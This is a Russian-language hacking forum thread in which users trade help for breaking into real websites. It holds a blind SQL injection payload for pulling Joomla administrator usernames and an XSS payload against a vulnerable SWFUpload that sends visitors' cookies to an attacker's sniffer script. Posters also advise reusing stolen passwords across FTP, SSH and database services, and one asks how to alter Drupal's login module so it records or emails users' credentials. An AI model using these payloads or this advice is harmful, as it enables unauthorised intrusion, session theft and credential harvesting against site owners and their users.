[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    скуля блиндовая, невыйдет. Есть другие способы?
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    как поставели вопрос, такой получили и ответ!

    Так и запрос составте под блинд, посимвольно и выдергивайте:

    PHP:
    and(select ascii(mid(concat(username),1,1))>40 from jos_users where usertype=0x53757065722041646D696E6973747261746F72 limit 0,1) -- 
     
    _________________________
    #502 winstrool, 19 Nov 2013
    Last edited: 19 Nov 2013
    1 person likes this.
  3. KroSaver

    KroSaver New Member

    Joined:
    2 Feb 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте.

    Какими способами можно распознать движок сайта?
     
  4. wowgamr

    wowgamr New Member

    Joined:
    12 Jan 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте!
    Подскажите, пожалуйста, что за движок?

    drdre5.ru

    PS нашёл. это бм Shop
     
    #504 wowgamr, 3 Jan 2014
    Last edited: 3 Jan 2014
  5. fakecoder

    fakecoder Banned

    Joined:
    31 Oct 2012
    Messages:
    19
    Likes Received:
    2
    Reputations:
    2
    Ребята, а не подскажите где можно глянуть исходники Site Sapies любой версии?
    В частности интересует с чем там пасс хешится, да и вообще хочется глянуть эту cms
     
  6. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Если вам очень повезет - найдете на каких-нибудь файлопомойках. Вообще это такая самопальная цмска, которую впаривают как "разработку сайта".

    Есть маленькое overview:
    http://www.sitesapiens.ru/site_sapiens_description.pdf

    В таких случаях, как правило, только получив шелл\чтение на одном из сайтов.

    UPD: Иногда в таких случаях удается развести авторов на демку этой цмс, попробуйте написать им, прикинувшись потенциальным клиентом.
     
  7. ysmat

    ysmat Member

    Joined:
    20 Apr 2006
    Messages:
    89
    Likes Received:
    5
    Reputations:
    -3
    есть ли какие слабости у 1С-битрикс Управление сайтом
    согласен на платный приват
     
  8. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Версия какая? Скриншот /bitrix/admin хотя бы.
     
  9. jassoc

    jassoc New Member

    Joined:
    24 Dec 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Кто слышал про GomyeCMS и про её уязвимости? Нашел только одно, и та на китайском. при переводе получается ужасно.
     
  10. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Вы все пары логин:пасс проверили? Попробуйте с ними достучаться на другие сервисы, ftp, ssh, sql, если открыты. Поищите что-нибудь вроде phpma где-нибудь рядом. В общем, ищите все, куда можно вбить логин:пасс и вбивайте. Также есть смысл залиться на сервак через соседние сайты и попробовать поднять локально через известные пароли.
     
  11. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Знакомая ситуация. Могу посоветовать немного рандомизировать пароли с помощью crunch или cupp. Даты можно косвенно выцепить из версий софта. Также иногда помогают exif-данные загруженных картинок или last-modified заголовки на некоторые страницы.
     
  12. student96

    student96 New Member

    Joined:
    3 Jul 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите, что означает запрос в логах сайта на wordpress :
    GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1
    где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.

    Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
     
  13. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100

    Password: 383256
    MD5(383256): 371425ff7acc4360c86d097ebe9eb082

    скорее всего бекдор
     
  14. SGskam

    SGskam Banned

    Joined:
    29 Oct 2013
    Messages:
    44
    Likes Received:
    1
    Reputations:
    0
    я слышал что в базах некоторых интернет-шопов хранится информация о карточках,
    которую продают, Что она вообще из себя представляет?
     
  15. agentru

    agentru New Member

    Joined:
    4 Dec 2010
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Нашел сайт на вордпрессе, где стоит уязвимый SWFUpload.
    Алерт отлично отрабатывает:
    http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//

    Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает:
    http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;//

    Даже банальная переадресация, также не отрабатывает:
    http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';//

    Подскажите пожалуйста, в чем может быть причина?
     
  16. SGskam

    SGskam Banned

    Joined:
    29 Oct 2013
    Messages:
    44
    Likes Received:
    1
    Reputations:
    0
    Вообщем такая проблема захожу на сайт в админку.Там есть кнопка администрирования и меня перекидывает ***.ru/admin.php и просто пустая страница, такая же фигня есле же пишу вместо сайта его ip/phpmyadmin просто пустая формаю, может какая защита
     
  17. yarr2

    yarr2 New Member

    Joined:
    29 Mar 2014
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Это троян в теме. Тут вкратце есть об этом
     
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Есть шелл на сайте, которого использует webAsyst, подскажите пожалуйста в каком файле лежат данные администратора.
     
  19. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Можно ли в Joomla 1.0.* авторизоваться в админку, если есть session_id администратора?
     
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Требуется подправить скрипт авторизации в drupal 6+, чтобы сохранялись данные авторизаций в файлике или отсылались на почту. Я так понимаю править нужно modules/user/user.module . Но что то неполучается все правильно сделать, ошибку сайт выдает, при попытке авторизации. Как правильно все настроить?